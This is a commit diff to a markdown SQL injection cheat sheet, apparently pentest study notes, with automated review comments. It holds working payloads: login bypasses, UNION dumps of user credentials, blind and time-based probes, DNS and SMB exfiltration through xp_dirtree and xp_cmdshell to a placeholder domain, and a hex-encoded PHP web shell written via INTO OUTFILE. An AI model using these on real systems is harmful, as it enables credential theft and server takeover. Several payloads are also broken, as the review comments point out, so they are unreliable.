cleanup and some examples

gurkenhabicht 2026-05-24 21:29:16 +02:00
parent 808ba8eed5
commit 9fe3c7f7cc
1 changed files with 63 additions and 17 deletions


@ -33,7 +33,7 @@ by just putting in a single quote
http://example.com/index.php?id='
```
**Incase of client side sanitization craft the URL instead of using the form!!!**
**In case of client side sanitization craft the URL instead of using the form!!!**
## In-Band SQLi
@ -42,8 +42,10 @@ Terminate the string of the SQL command via `'` and resolve via tautology like
and delivers a response containing DB content
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
SELECT * FROM users WHERE username = admin AND password = '' or 1=1; -- -
SELECT * FROM users WHERE username = admin AND password = '' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password = '' or 1=1 --+
SELECT * FROM users WHERE username = admin AND password = "" or 1=1; --+
```
There are further methods of SQL injection following below.
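Review bot: all six lines still compare `username = admin` against an unquoted identifier, so none of them parses as the query the surrounding text describes; quote it as `username = 'admin'` in the context lines as well as in the replacement lines. The `and 1=1` variant on the fourth line also stops being a tautology once the password becomes `''`: it evaluates to `password = '' AND 1=1`, which only matches an empty password, so either drop that line or label it as the false/baseline case rather than as a bypass.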
@ -63,7 +65,7 @@ id=(SELECT banner FROM v$version) # oracle
Union based injections is an incremental and cautios approach.
Start by trying to provoke errors to validate a possible injection.
* __First method__ check by order until error occurs
__First method__ check by order until error occurs
```sql
' order by 1 -- -
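Review bot: the context line `Union based injections is an incremental and cautios approach.` has a typo (`cautios` should be `cautious`) and a number-agreement error (`injections is` should be `injection is` or `injections are`); since this hunk already edits the line directly after it, fix both while here.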
@ -73,7 +75,7 @@ Start by trying to provoke errors to validate a possible injection.
Check the number of columns by inserting NULL values one after another.
__Second method__ fuzzing NULL values, followed by fuzzing data types
__Second method__ fuzzing NULL values, followed by fuzzing data types
Check number of cols
@ -96,20 +98,30 @@ Check which one contains String values
Retrieve content, for cols as an example, or dump database
```sql
' UNION SELECT NULL, NULL, database(), NULL
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- - //
' UNION SELECT NULL,username,password,NULL FROM users -- - //
```
Retrieve content by union poking the count and order of columns, afterwards
extracting tables via
extracting tables via:
```sh
0 union select null, null, database()
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
0 union select null, null, group_concat(username, ':', password from found_tablename
0 union select null, null, group_concat(username, ':', password SEPARATOR '<br>') from found_tablename;
```
Function `group_concat` concatenates all rows into a single string.
* `information_schema.tables` acts on every available table of a database.
* `information_schema.columns`
Option `table_schema` contains the name of the database, `table_name` the name
of the tables inside the database and `column_name` the names of the columns of
a selected table.
The examples above contain methods of retrieving table name, column names. The
last example uses the information returned to inject the correct column names
so the acutal content of them are retrieved. Further examples under [SQL
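Review bot: the two new `UNION SELECT` lines disagree on column count (five expressions in `NULL,NULL,database(),NULL,NULL`, four in `NULL,username,password,NULL`), yet they are presented as consecutive steps against the same query; pick one count and keep it throughout the block. The trailing `//` on both lines is not a MySQL comment token and should go, the second fence is tagged `sh` although it holds SQL, the bullet `information_schema.columns` has no description unlike the `information_schema.tables` bullet above it, and `acutal` in the closing sentence should be `actual`.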
@ -120,7 +132,7 @@ Functions](#SQL-Functions)
Use SQL functions to poke the tables & cols via union.
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
Extract tables
Extract tables
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
@ -128,7 +140,7 @@ Extract tables
SQLite specifica
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
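Review bot: dropping the leading `'` from `UNION SELECT sql, sql FROM sqlite_master -- -` makes this example inconsistent with the rest of the file, where the quote closes the string literal before the injected clause (see the `' UNION SELECT NULL,...` lines earlier in this file); either keep `' UNION SELECT ...` or add a sentence saying the terminator is omitted here and has to be chosen per injection point.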
@ -165,10 +177,24 @@ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
Blind boolean base substring fuzzes one char at a time, by inspecting the
return value after each inserted char.
return value after each inserted char. This can be used if the response
includes some kind of boolean statement about the existence of a database or
table.
Extract database:
```sql
' UNION SELECT null,null,null where database() like 'da%';-- -
UNION SELECT null,null,null where database() LIKE '%'; -- -
```
```sql
UNION SELECT null,null,null where database() like 'da%';-- -
```
If the database name is known fuzz the tablename:
```sql
UNION SELECT null,null,null FROM information_schema.tables WHERE table_schema = 'db_name' AND table_name LIKE 'a%'; -- -
```
### Time Based
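Review bot: the prose says the substring is fuzzed one character at a time, but the examples jump from `LIKE '%'` straight to `LIKE 'da%'` without saying that `'%'` is the always-true baseline and that each further probe extends the prefix by one character until the response flips; add that sentence under `Extract database:` so the two blocks read as one procedure. The leading `'` was also removed from these payloads while the union examples earlier in the file still carry it; keep one convention.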
@ -177,8 +203,9 @@ Checking input blindly via sleep() function. Count the number of columns in
this way. on success, the sleep(5) function executes
```sql
' union select sleep(3), null; -- -
' SELECT * from users where id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
UNION SELECT sleep(3), null; -- -
UNION SELECT sleep(3),1 null; -- - one column
SELECT * FROM users WHERE id = 420; IF (69=69) WAITFOR DELAY '00:00:03' -- -
```
### Blind injection
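Review bot: `UNION SELECT sleep(3),1 null; -- - one column` is not valid SQL: `1 null` lacks a comma and `NULL` cannot serve as a column alias, and the line selects two expressions despite the `one column` annotation. For a single-column target it should read `UNION SELECT sleep(3); -- -`, and the annotation belongs in the prose or behind the comment marker. The prose above also says `sleep(5)` while every example uses `sleep(3)`; align the two.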
@ -250,6 +277,21 @@ original SQLi payload.
Check if an inserted SQL query may be set instead of regular data, e.g. instead
of a name and let it be queried via a second step.
### DNS Resolution Including Exfiltrated Data
Read a file on Windows via `LOAD_FILE()` and add its content as a subdomain, so the DNS request will contain the exfiltrated data.
```sql
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.mydomain.com\\share'));
```
Another possibility of data extraction is `xp_dirtree` which triggers DNS
resolution for the target server:
```sql
EXEC master..xp_dirtree '\\mydomain.com\share';
```
### Other Communication Channels
Instead of a direct response there may be indirect results possible, like the following.
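Review bot: the sentence `Read a file on Windows via LOAD_FILE() and add its content as a subdomain` does not describe the payload beneath it: `LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.mydomain.com\\share'))` places the result of `database()` into the hostname of a UNC path, and it is the DNS lookup for that hostname that carries the value; nothing from a file is read or sent. Reword along the lines of `Force a UNC path lookup via LOAD_FILE() with query output embedded as a subdomain, so the DNS request carries the data`, and say that this applies to MySQL running on a Windows host.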
@ -257,7 +299,7 @@ Instead of a direct response there may be indirect results possible, like the fo
Write to a file via `OUTFILE`.
```sql
SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt`
SELECT passwords FROM users INTO OUTFILE '/dev/shm/passwords.txt';
```
Executing shell commands for extraction through `xp_cmdshell` on MYSQL.
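Review bot: the context line `Executing shell commands for extraction through xp_cmdshell on MYSQL.` names the wrong platform: `xp_cmdshell` is a Microsoft SQL Server extended stored procedure, consistent with the `EXEC master..xp_dirtree` example added in the previous hunk; change `MYSQL` to `MSSQL` (or `Microsoft SQL Server`) while this block is being touched.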
@ -267,6 +309,10 @@ exfiltration target.
Other exfiltration targets may be DNS or SMB servers.
```sql
EXEC xp_cmdshell 'nslookup data.mydomain.com';
```
On the attacker side start an SMB server.
```sh
@ -296,7 +342,7 @@ parameter
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
```
Insert `<?php system($_GET["cmd"]); ?>`
Insert `<?php system($_GET["cmd"]); ?>`
```sql
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
@ -317,7 +363,7 @@ Get column names through the following example.
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
Get rows from users by id
Get rows from users by id
```HTTP
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
@ -325,7 +371,7 @@ GET /about/0 UNION all select notes, null, null, null, null from users where id
## Filter Bypass
Bypass may be possible through character encodings like
Bypass may be possible through character encodings like
* Percent/URL
* Hex